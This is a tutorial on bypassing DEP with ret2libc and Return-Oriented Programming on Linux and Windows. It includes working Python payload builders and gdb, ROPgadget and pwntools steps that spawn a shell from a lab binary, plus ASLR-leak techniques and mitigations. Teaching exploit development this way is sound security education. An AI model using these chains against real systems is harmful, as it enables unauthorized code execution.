Bypassing DEP with Return-Oriented Programming (ROP)
In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP (Data Execution Prevention).
But in the real world, DEP is on. The stack is marked as non-executable. Even if our shellcode lands perfectly in memory, the CPU refuses to execute it — the NX bit in the page table says “this is data, not code.”
So how do modern exploits achieve code execution when they can’t inject code?
The answer is Return-Oriented Programming (ROP). Instead of injecting new code, we reuse code that already exists in the process: fragments of legitimate functions in the executable and its loaded libraries. We chain these fragments together to build an arbitrary program, a few instructions at a time.
ROP is the single most important technique in modern binary exploitation. If you understand ROP, you understand how real-world exploits work.
Why DEP Kills Traditional Shellcode
Let’s be clear about what DEP does. Every memory page has permission flags:
.text (code) → Read + Execute (RX)
.data (data) → Read + Write (RW)
Stack → Read + Write (RW) ← NO Execute
Heap → Read + Write (RW) ← NO Execute
When we overflow the buffer and write shellcode to the stack, it sits in an RW page. When we redirect EIP to our shellcode, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation.
Before DEP: Stack = RWX → shellcode runs fine
After DEP: Stack = RW → "Access Violation: attempted to execute non-executable memory"
We can write anything to the stack. We just can’t execute what we write. So we need a different approach.
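On Linux, these permissions are visible in /proc/<pid>/maps. The sketch below parses text in that format and answers one question: is a given address inside an executable mapping? The sample lines, including the paths and address ranges, are made up for illustration and are not output from the tutorial's binary.

```python
# Sketch: read page permissions from text in /proc/<pid>/maps format.
# SAMPLE_MAPS is made-up illustrative data, not output from a real process.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 131090 /home/user/vulnerable
0804a000-0804b000 rw-p 00001000 08:01 131090 /home/user/vulnerable
f7e08000-f7fb5000 r-xp 00000000 08:01 262200 /lib/i386-linux-gnu/libc.so.6
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

def parse_maps(text):
    """Return a list of (start, end, perms, name) tuples."""
    regions = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        start, end = (int(x, 16) for x in fields[0].split("-"))
        name = fields[5] if len(fields) > 5 else ""
        regions.append((start, end, fields[1], name))
    return regions

def is_executable(regions, addr):
    """True if addr falls inside a mapping that has the x permission."""
    for start, end, perms, _ in regions:
        if start <= addr < end:
            return "x" in perms
    return False

regions = parse_maps(SAMPLE_MAPS)
print(is_executable(regions, 0xffffd000))  # an address on the stack
print(is_executable(regions, 0xf7e42da0))  # an address inside libc's code
```

With DEP on, the stack address reports no Execute permission while the libc address does, which is exactly the asymmetry the rest of this tutorial exploits.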
The Core Idea — Reusing Existing Code
Here’s the key insight: the .text section of the executable and the code sections of its loaded libraries (libc on Linux; kernel32 and ntdll on Windows) are already executable. These are legitimate code pages with the Execute permission. We can’t inject new code, but we can jump to code that’s already there.
The simplest version of this is ret2libc — return to a libc function.
ret2libc — The Predecessor to ROP
Instead of returning to shellcode, we overwrite the return address with the address of a libc function — like system(). Then we arrange the stack so that system() receives the argument "/bin/sh".
The stack layout:
| buffer padding | EBP | system() addr | return after system | "/bin/sh" addr |
When the vulnerable function returns:
- ret pops the system() address into EIP
- The CPU jumps to system(), which is in an executable page (libc)
- system() reads its argument from the stack: the address of "/bin/sh"
- system("/bin/sh") executes and a shell is spawned
No shellcode needed. We just called an existing function with our own arguments.
Finding the Addresses
# Find system() address in libc
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>
# Find "/bin/sh" string in libc (libc contains this string!)
(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf
# Find exit() for clean termination
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>
The Exploit
import struct
offset = 76 # padding to reach return address (varies per binary)
system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr = struct.pack("<I", 0xf7e369e0)
binsh_addr = struct.pack("<I", 0xf7f588cf)
# Stack layout after overflow:
# [padding] [system()] [exit()] ["/bin/sh"]
# [exit()] is the return address system() sees; ["/bin/sh"] is its argument
payload = b"A" * offset + system_addr + exit_addr + binsh_addr
with open("payload", "wb") as f:
    f.write(payload)
$ (cat payload; cat) | ./vulnerable
ls
exploit.py payload vulnerable vulnerable.c
whoami
thilan
Shell spawned. No shellcode. No executable stack. DEP is still on.
Limitations of ret2libc
ret2libc works for simple cases, but it’s limited:
- You can only call whole functions
- Complex multi-step operations (like setting up a socket for a reverse shell) require chaining many function calls with carefully arranged arguments
- On x86-64, arguments are passed in registers (rdi, rsi, rdx), not the stack — so you need to control registers too
This is where ROP comes in.
Return-Oriented Programming — The Full Technique
ROP generalizes ret2libc. Instead of jumping to whole functions, we jump to small fragments of code that end with a ret instruction. These fragments are called gadgets.
What’s a Gadget?
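A gadget is a short sequence of instructions ending with ret. Gadgets exist naturally throughout the executable and its libraries: most are the tail ends of real functions, and on x86 more appear when execution starts in the middle of an existing instruction, because the same bytes then decode as different instructions.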
; Gadget 1: pop eax; ret
0x08048456: pop eax
0x08048457: ret
; Gadget 2: pop ebx; ret
0x0804862a: pop ebx
0x0804862b: ret
; Gadget 3: mov [eax], ebx; ret
0x08048734: mov dword [eax], ebx
0x08048736: ret
; Gadget 4: xor eax, eax; ret
0x08048512: xor eax, eax
0x08048514: ret
Each gadget does one small thing — pop a value into a register, move data, perform arithmetic — and then returns. The ret instruction pops the next address from the stack into EIP, jumping to the next gadget.
How ROP Chains Work
The ret instruction does one thing: pop EIP. It takes the 4-byte value at the top of the stack, puts it in EIP, and increments ESP by 4.
In a normal program, ret returns to the caller. But if we control the stack (via buffer overflow), we control what ret pops. We can make it pop any address — the address of our next gadget.
Stack (after overflow):
┌─────────────────────┐ ← ESP when the vulnerable function executes ret
│ Address of Gadget 1 │ → pop eax; ret
├─────────────────────┤
│ Value for EAX │ → popped by "pop eax"
├─────────────────────┤
│ Address of Gadget 2 │ → pop ebx; ret (popped by "ret" of Gadget 1)
├─────────────────────┤
│ Value for EBX │ → popped by "pop ebx"
├─────────────────────┤
│ Address of Gadget 3 │ → mov [eax], ebx; ret
├─────────────────────┤
│ Address of Gadget 4 │ → next operation...
├─────────────────────┤
│ ... │
└─────────────────────┘
Execution flow:
- The vulnerable function’s ret pops the Gadget 1 address → jumps to pop eax; ret
- pop eax loads our value into EAX. ret pops the Gadget 2 address → jumps there
- pop ebx loads our value into EBX. ret pops the Gadget 3 address → jumps there
- mov [eax], ebx writes EBX to the address in EAX. ret pops the next address…
Each ret acts as the “glue” between gadgets. The stack becomes our program, and each entry is either a gadget address or data.
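To make the "stack is the program" idea concrete, here is a toy emulator, a sketch rather than a real CPU model. The stack is a Python list of 32-bit values, and each gadget is a small function standing in for the instructions before its ret. The gadget addresses are the illustrative ones from the listing above; the write target 0x0804a028 is a hypothetical writable address.

```python
# Toy model of ROP execution: the "stack" is a list of 32-bit values and each
# gadget is a Python function standing in for the instructions before its ret.

def run_chain(stack, gadgets, regs, memory):
    """Emulate ret-driven control flow until the stack runs out."""
    sp = 0
    trace = []
    while sp < len(stack):
        target = stack[sp]       # ret: pop the next address into EIP
        sp += 1
        if target not in gadgets:
            break                # unknown address: a real CPU would crash here
        trace.append(target)
        sp = gadgets[target](stack, sp, regs, memory)
    return trace

def pop_eax(stack, sp, regs, memory):
    regs["eax"] = stack[sp]      # pop eax consumes one stack slot
    return sp + 1

def pop_ebx(stack, sp, regs, memory):
    regs["ebx"] = stack[sp]      # pop ebx consumes one stack slot
    return sp + 1

def mov_eax_ebx(stack, sp, regs, memory):
    memory[regs["eax"]] = regs["ebx"]   # mov [eax], ebx
    return sp

GADGETS = {0x08048456: pop_eax, 0x0804862a: pop_ebx, 0x08048734: mov_eax_ebx}

chain = [0x08048456, 0x0804a028,   # pop eax; ret  -> EAX = target address
         0x0804862a, 0x6e69622f,   # pop ebx; ret  -> EBX = "/bin" (little-endian)
         0x08048734]               # mov [eax], ebx; ret
regs, memory = {"eax": 0, "ebx": 0}, {}
trace = run_chain(chain, GADGETS, regs, memory)
print(hex(memory[0x0804a028]))     # 0x6e69622f
```

Notice that the emulator's loop never changes: all of the behavior lives in the list we hand it. That is the attacker's position after the overflow.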
With a rich enough gadget set, this is Turing-complete: we can perform any computation, including arithmetic, memory reads and writes, system calls, and function calls. We’re building a program out of fragments of existing code.
Finding Gadgets
You don’t search for gadgets by hand. Tools do this automatically.
ROPgadget
$ ROPgadget --binary ./vulnerable
Gadgets information
============================================================
0x080485a6 : pop eax ; ret
0x080485f7 : pop ebx ; ret
0x0804861a : pop ecx ; pop edx ; ret
0x08048734 : mov dword ptr [eax], ebx ; ret
0x08048512 : xor eax, eax ; ret
0x080484f1 : inc eax ; ret
0x08048423 : int 0x80 ; ret
...
Unique gadgets found: 147
ropper
$ ropper --file ./vulnerable --search "pop eax"
[INFO] Searching for gadgets: pop eax
0x080485a6: pop eax; ret;
0x080487c3: pop eax; pop ebx; ret;
Searching in libc (many more gadgets)
$ ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 | wc -l
12847
libc alone contains thousands of useful gadgets. The more code loaded into the process, the more gadgets available.
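To get a feel for what these tools do, here is a deliberately naive scanner. It only looks for a single-byte pop reg opcode (0x58 to 0x5f) followed directly by ret (0xc3); real tools recognize far more patterns and use a full disassembler. The sample bytes are hand-assembled for illustration and are not taken from ./vulnerable.

```python
# Naive gadget finder: look for single-byte "pop reg" opcodes (0x58-0x5f)
# immediately followed by ret (0xc3). Real tools handle many more patterns.
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET = 0xC3

def find_pop_ret(code, base):
    """Return (address, text) pairs for every 'pop reg; ret' byte pair in code."""
    found = []
    for i in range(len(code) - 1):
        if 0x58 <= code[i] <= 0x5F and code[i + 1] == RET:
            found.append((base + i, f"pop {POP_REGS[code[i] - 0x58]} ; ret"))
    return found

# Hand-assembled sample bytes (illustrative only):
# 89 e5 = mov ebp, esp ; 58 c3 = pop eax ; ret
# 31 c0 = xor eax, eax ; 5b c3 = pop ebx ; ret
sample = bytes.fromhex("89e558c331c05bc3")
for addr, text in find_pop_ret(sample, 0x08048000):
    print(f"{addr:#010x} : {text}")
# 0x08048002 : pop eax ; ret
# 0x08048006 : pop ebx ; ret
```

Because the loop tests every byte offset rather than only instruction boundaries, the same approach also finds gadgets hidden inside longer instructions.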
Practical Example — execve() via ROP on Linux
Let’s build a ROP chain that calls execve("/bin/sh", NULL, NULL) — the same thing our shellcode did, but without any injected code.
On 32-bit Linux, the execve syscall requires:
EAX = 11 (syscall number for execve)
EBX = pointer to "/bin/sh"
ECX = NULL (argv)
EDX = NULL (envp)
then: int 0x80
We need to:
- Write the string “/bin/sh” somewhere in writable memory
- Set EAX = 11
- Set EBX = address of “/bin/sh”
- Set ECX = 0
- Set EDX = 0
- Execute int 0x80
Step 1: Find Gadgets
$ ROPgadget --binary ./vulnerable --search "pop eax"
0x080485a6 : pop eax ; ret
$ ROPgadget --binary ./vulnerable --search "pop ebx"
0x080485f7 : pop ebx ; ret
$ ROPgadget --binary ./vulnerable --search "pop ecx"
0x0804861a : pop ecx ; pop edx ; ret # bonus: sets both ECX and EDX!
$ ROPgadget --binary ./vulnerable --search "int 0x80"
0x08048423 : int 0x80
Step 2: Find a Writable Location
We need somewhere to write “/bin/sh”. The .data or .bss section is writable:
$ readelf -S ./vulnerable | grep -E "\.data|\.bss"
[24] .data PROGBITS 0804a020 001020 000008 00 WA 0 0 4
[25] .bss NOBITS 0804a028 001028 000004 00 WA 0 0 1
We’ll write to 0x0804a028 (.bss section).
Step 3: Build the Chain
import struct
p = lambda x: struct.pack("<I", x)
# Gadget addresses (found with ROPgadget)
pop_eax = 0x080485a6
pop_ebx = 0x080485f7
pop_ecx_edx = 0x0804861a
mov_eax_ebx = 0x08048734 # mov dword [eax], ebx; ret
int_0x80 = 0x08048423
xor_eax = 0x08048512 # xor eax, eax; ret
inc_eax = 0x080484f1 # inc eax; ret
writable = 0x0804a028 # .bss section
offset = 76 # padding to return address
payload = b"A" * offset
# --- Write "/bin" to .bss ---
payload += p(pop_eax)
payload += p(writable) # EAX = address to write to
payload += p(pop_ebx)
payload += b"/bin" # EBX = "/bin" (4 bytes)
payload += p(mov_eax_ebx) # write "/bin" to [.bss]
# --- Write "/sh\x00" to .bss+4 ---
payload += p(pop_eax)
payload += p(writable + 4) # EAX = .bss + 4
payload += p(pop_ebx)
payload += b"/sh\x00" # EBX = "/sh\0"
payload += p(mov_eax_ebx) # write "/sh\0" to [.bss+4]
# --- Set up registers for execve ---
payload += p(pop_ebx)
payload += p(writable) # EBX = pointer to "/bin/sh"
payload += p(pop_ecx_edx)
payload += p(0) # ECX = NULL (argv)
payload += p(0) # EDX = NULL (envp)
# --- Set EAX = 11 (execve syscall number) ---
payload += p(xor_eax) # EAX = 0
for _ in range(11):
    payload += p(inc_eax) # EAX++ eleven times
# --- Trigger syscall ---
payload += p(int_0x80) # execve("/bin/sh", NULL, NULL)
with open("payload", "wb") as f:
    f.write(payload)
$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)
Shell spawned. DEP is on. No shellcode was injected. Every instruction we executed was already in the binary’s .text section. We just jumped to them in the right order.
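The two hand-written writes in the chain generalize to strings of any length. The helper below is a sketch with a hypothetical name, write_string; it assumes the same three gadgets used above (pop eax, pop ebx, and mov [eax], ebx) and emits one write per 4-byte chunk, padding the string with NUL bytes so it is always terminated.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian value."""
    return struct.pack("<I", value)

def write_string(data, dest, pop_eax, pop_ebx, mov_eax_ebx):
    """Emit chain bytes that store `data` at `dest`, 4 bytes per write."""
    pad = 4 - len(data) % 4                        # 1 to 4 NUL bytes: terminate and align
    data += b"\x00" * pad
    chain = b""
    for i in range(0, len(data), 4):
        chain += p32(pop_eax) + p32(dest + i)      # EAX = where to write
        chain += p32(pop_ebx) + data[i:i + 4]      # EBX = 4 bytes of the string
        chain += p32(mov_eax_ebx)                  # mov [eax], ebx
    return chain

chain = write_string(b"/bin/sh", 0x0804a028,
                     pop_eax=0x080485a6, pop_ebx=0x080485f7,
                     mov_eax_ebx=0x08048734)
print(len(chain))   # 40: two writes of five 4-byte slots each
```

For "/bin/sh" this produces the same bytes as the two manual write blocks in the chain above.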
ROP on x86-64
On 64-bit systems, function arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. This actually makes ROP easier in some ways — we just need pop rdi; ret gadgets to set up arguments.
For calling system("/bin/sh"):
# 64-bit ROP chain
import struct
p64 = lambda x: struct.pack("<Q", x) # pack a 64-bit little-endian value
offset = 72 # padding to return address (placeholder; varies per binary)
pop_rdi = 0x00400753 # pop rdi; ret (found with ROPgadget)
binsh = 0x7ffff7f588cf # address of "/bin/sh" in libc
system = 0x7ffff7e42da0 # system() in libc
exit_fn = 0x7ffff7e369e0 # exit() in libc
payload = b"A" * offset
payload += p64(pop_rdi) # pop rdi; ret
payload += p64(binsh) # rdi = "/bin/sh"
payload += p64(system) # call system("/bin/sh")
payload += p64(pop_rdi) # pop rdi; ret (clean up)
payload += p64(0) # rdi = 0
payload += p64(exit_fn) # call exit(0)
Cleaner than the 32-bit version — one gadget to set the argument, one call to system().
Stack Alignment on x86-64
On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call instruction. If your ROP chain doesn’t maintain alignment, system() or other libc functions may crash with a segfault on a movaps instruction (which requires 16-byte alignment).
The fix: add a single ret gadget before the function call to adjust the stack by 8 bytes.
ret_gadget = 0x00400754 # just "ret"
payload += p64(ret_gadget) # align the stack
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
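Whether the extra ret is needed depends on where the function's address lands in the chain. As a rough check, assuming we know the stack address of the overwritten return address (the value below is a hypothetical one, of the kind you would read from gdb), the alignment rule above reduces to a little arithmetic:

```python
def needs_ret_pad(chain_start, slot_index):
    """True if entering the function in chain slot `slot_index` would leave
    the stack misaligned.

    chain_start is the stack address of slot 0 (the overwritten return
    address); each slot is 8 bytes. When ret pops slot k, RSP becomes
    chain_start + 8 * (k + 1). After a normal call, RSP % 16 == 8 at
    function entry, so that is what the function's code expects.
    """
    rsp_at_entry = chain_start + 8 * (slot_index + 1)
    return rsp_at_entry % 16 != 8

# Hypothetical stack address of the saved return address:
chain_start = 0x7fffffffe0d8

# Chain: [pop rdi][binsh][system] -> system is slot 2
print(needs_ret_pad(chain_start, 2))   # True: insert a ret gadget
# Chain: [ret][pop rdi][binsh][system] -> system is slot 3
print(needs_ret_pad(chain_start, 3))   # False: aligned
```

In practice most people skip the arithmetic: if the chain crashes on movaps, add one ret and try again.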
ROP on Windows
Windows ROP works the same way conceptually, but the calling convention and syscall interface differ.
On 32-bit Windows, you typically ROP into Windows API functions:
- VirtualProtect() — Change memory page permissions (make the stack executable, then jump to shellcode)
- VirtualAlloc() — Allocate a new RWX memory region, copy shellcode there, jump to it
- WriteProcessMemory() — Write shellcode to an executable region
The most common approach is to use ROP to call VirtualProtect() and make the stack executable, then jump to your shellcode normally:
ROP chain:
1. Set up arguments for VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old_protect)
2. Call VirtualProtect()
3. Stack is now executable
4. Jump to shellcode on the stack
This is called ROP to VirtualProtect — the classic Windows DEP bypass.
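As a sketch of what the stack needs to look like when execution reaches VirtualProtect() on 32-bit Windows (stdcall, arguments on the stack), the helper below packs the six values in order. The function name virtualprotect_frame and every address passed to it are hypothetical placeholders; only the PAGE_EXECUTE_READWRITE value (0x40) is a documented constant.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40   # documented Win32 memory-protection constant

def virtualprotect_frame(vp_addr, shellcode_addr, region_size, old_protect_ptr):
    """Lay out a 32-bit stdcall frame for
    VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect)."""
    return struct.pack(
        "<6I",
        vp_addr,                 # popped by ret: jump into VirtualProtect
        shellcode_addr,          # VirtualProtect's return address: the shellcode
        shellcode_addr,          # lpAddress: start of the region to make executable
        region_size,             # dwSize
        PAGE_EXECUTE_READWRITE,  # flNewProtect
        old_protect_ptr,         # lpflOldProtect: any writable address
    )

# All four values below are hypothetical placeholders.
frame = virtualprotect_frame(0x7c801ad4, 0x0012ff80, 0x201, 0x0012ff70)
print(frame.hex())
```

A static frame like this only works when the input can carry null bytes and the stack address is known in advance. When that isn't the case, the ROP chain has to compute these values in registers and write them into place, which is where most of the gadget work on Windows goes.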
ASLR — The Next Challenge
We’ve bypassed DEP with ROP. But there’s another protection we’ve been ignoring: ASLR (Address Space Layout Randomization).
ASLR randomizes the base addresses of:
- The executable (if PIE — Position Independent Executable)
- Shared libraries (libc, etc.)
- The stack
- The heap
This means the gadget addresses we hardcoded change every run. Our ROP chain breaks because the gadgets aren’t where we expect them.
Defeating ASLR
ASLR is bypassed through information leaks — bugs that reveal memory addresses at runtime:
Format string vulnerabilities — printf(user_input) can leak stack contents, including return addresses and libc pointers.
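Partial overwrite: ASLR shifts mappings in whole pages, so the low 12 bits of any code address are never randomized, on 32-bit and 64-bit systems alike. Overwriting only the lowest byte of an existing pointer redirects execution to a nearby address without knowing the full address. A 2-byte overwrite also covers 4 randomized bits, so it succeeds about 1 time in 16.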
Information disclosure bugs — Buffer over-reads, uninitialized memory, error messages containing addresses.
Brute force (32-bit only) — On 32-bit Linux, ASLR has only ~8-12 bits of entropy for libraries. That’s 256-4096 possible positions. With a forking server (that doesn’t re-randomize), you can brute-force the correct address in seconds.
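Two of the points above are plain arithmetic, and a short sketch makes them concrete. The load bases and the function offset are hypothetical values chosen for illustration.

```python
PAGE_SIZE = 0x1000

def candidate_positions(entropy_bits):
    """Number of equally likely base addresses for a given entropy."""
    return 2 ** entropy_bits

def low_12_bits(base, offset):
    """Low 12 bits of a symbol's address when its library loads at base."""
    assert base % PAGE_SIZE == 0, "load bases are page-aligned"
    return (base + offset) & 0xFFF

offset = 0x3ada0   # hypothetical offset of a function inside the library
for base in (0xf7d00000, 0xf7e08000, 0xf7521000):   # hypothetical load bases
    print(hex(base + offset), hex(low_12_bits(base, offset)))   # low bits: 0xda0 each time

print(candidate_positions(8), candidate_positions(12))   # 256 4096
```

The full address changes with every base, but the last three hex digits never do. That is why a partial overwrite works, and why a brute-force attack only has to guess the bits above them.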
The typical attack flow:
1. Exploit info leak to discover libc base address
2. Calculate gadget addresses: gadget = libc_base + known_offset
3. Build ROP chain with correct addresses
4. Send ROP chain → shell
This is why modern exploitation often requires two-stage attacks: first leak an address, then exploit.
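Steps 1 to 3 of that flow come down to one subtraction and a few additions. In the sketch below, the offsets, the leaked value, and the 0xdeadbeef dummy return address are all hypothetical; for a real target the offsets come from the exact libc file in use.

```python
import struct

def libc_base_from_leak(leaked_addr, symbol_offset):
    """Recover the load base from one leaked pointer to a known symbol."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or wrong symbol")
    return base

# Hypothetical offsets inside the target's libc.
OFFSETS = {"puts": 0x5fca0, "system": 0x3ada0, "str_bin_sh": 0x15ba0b}

leaked_puts = 0xf7d5fca0   # hypothetical value obtained through an info leak
base = libc_base_from_leak(leaked_puts, OFFSETS["puts"])
system_addr = base + OFFSETS["system"]
binsh_addr = base + OFFSETS["str_bin_sh"]

# Second stage: the ret2libc layout from earlier, now with runtime addresses.
# 0xdeadbeef is a dummy return address for system().
stage2 = struct.pack("<III", system_addr, 0xdeadbeef, binsh_addr)
print(hex(base), hex(system_addr))   # 0xf7d00000 0xf7d3ada0
```

The page-alignment check is a cheap sanity test: if the computed base doesn't end in three zero hex digits, the leak or the libc version is wrong, and sending the second stage would only crash the target.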
Automated ROP Chain Generation
Building ROP chains by hand is educational but tedious. Tools can generate them automatically:
pwntools (Python)
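from pwn import *
elf = ELF('./vulnerable')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
# Rebase libc so lookups return runtime addresses instead of file offsets.
# 0xf7e42da0 is the system() address from gdb above (ASLR off); with ASLR on, use a leaked address.
libc.address = 0xf7e42da0 - libc.symbols['system']
offset = 76 # padding to return address (varies per binary)
rop = ROP([elf, libc])
# Automatically find gadgets and build a chain
rop.call('system', [next(libc.search(b'/bin/sh'))])
rop.call('exit', [0])
payload = b"A" * offset + rop.chain()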
ROPgadget automatic chain
$ ROPgadget --binary ./vulnerable --ropchain
ROP chain generation
===========================================================
- Step 1 -- Write-what-where gadgets
[+] Gadget found: 0x08048734 mov dword ptr [eax], ebx ; ret
...
- Step 5 -- Syscall gadget
[+] Gadget found: 0x08048423 int 0x80
ROP chain:
p = b""
p += pack('<I', 0x080485a6) # pop eax; ret
p += pack('<I', 0x0804a028) # .bss address
...
These tools search the binary for gadgets and automatically construct chains for common operations (execve, mprotect, etc.).
Mitigations Against ROP
The security community hasn’t been standing still:
Control Flow Integrity (CFI): Validates that indirect control transfers go to legitimate targets. Clang/LLVM CFI and Windows Control Flow Guard (CFG) check forward edges (indirect calls); return addresses are left to backward-edge defenses such as shadow stacks.
Shadow Stacks — A separate, protected copy of the return address. On ret, the hardware compares the stack’s return address with the shadow stack. A mismatch indicates a ROP attack. Intel CET (Control-flow Enforcement Technology) implements this in hardware.
Stack Canaries: A random value placed between a function’s local buffers and its saved return address. A linear overflow that reaches the return address also overwrites the canary, and the function checks it before ret executes. Canaries don’t prevent ROP directly, but they make the initial stack overflow much harder to exploit.
ASLR with high entropy — 64-bit ASLR has much more entropy than 32-bit, making brute force impractical. Combined with PIE (position-independent executables), every code address is randomized.
Restricted gadget availability — Compilers can be configured to reduce the number of useful gadgets by aligning returns, eliminating unnecessary code, and using alternative instruction sequences.
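Of these, the shadow stack is the one that targets ROP most directly, and its check is simple enough to model in a few lines. This is a toy sketch with hypothetical class names, not how Intel CET is implemented: call records the return address in two places, and ret refuses to proceed if they disagree.

```python
class ShadowStackViolation(Exception):
    pass

class ToyCPU:
    """Toy model: call pushes the return address to both stacks,
    ret compares them before transferring control."""
    def __init__(self):
        self.stack = []     # ordinary stack, attacker-writable via overflow
        self.shadow = []    # shadow stack, not reachable by normal stores

    def call(self, return_addr):
        self.stack.append(return_addr)
        self.shadow.append(return_addr)

    def ret(self):
        target = self.stack.pop()
        expected = self.shadow.pop()
        if target != expected:
            raise ShadowStackViolation(f"ret to {target:#x}, expected {expected:#x}")
        return target

cpu = ToyCPU()
cpu.call(0x08048500)            # legitimate call site
cpu.stack[-1] = 0x080485a6      # overflow replaces the return address with a gadget
try:
    cpu.ret()
except ShadowStackViolation as exc:
    print("blocked:", exc)      # blocked: ret to 0x80485a6, expected 0x8048500
```

Every ret in a ROP chain after the first has no matching call at all, so under this check the chain is stopped at its first gadget.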
Despite all these mitigations, ROP remains a viable technique. Each mitigation raises the bar, but creative attackers continue to find ways around them. That’s the arms race of exploit development.
Summary
| Concept | What It Does |
|---|---|
| DEP/NX | Makes stack/heap non-executable — kills traditional shellcode |
| ret2libc | Return to libc functions — simplest DEP bypass |
| ROP | Chain gadgets (instruction fragments ending in ret) — full DEP bypass |
| Gadgets | Small instruction sequences in existing code, ending with ret |
| ROP Chain | Stack layout where each entry is a gadget address or data |
| ASLR | Randomizes addresses — requires info leak to bypass |
| Tools | ROPgadget, ropper, pwntools — automate gadget finding and chain building |
The progression of exploit development tells a story:
- Classic overflow — Inject shellcode, jump to it. Stopped by DEP.
- ret2libc — Call existing functions. Limited to whole functions.
- ROP — Chain gadgets for arbitrary computation. Bypasses DEP completely.
- ROP + info leak — Defeat ASLR by discovering addresses at runtime.
- Advanced mitigations — CFI, shadow stacks, CET. The arms race continues.
Understanding ROP is essential for both attackers and defenders. If you’re doing exploit development, it’s your primary tool. If you’re doing defense, it’s what you’re defending against.
Happy reversing!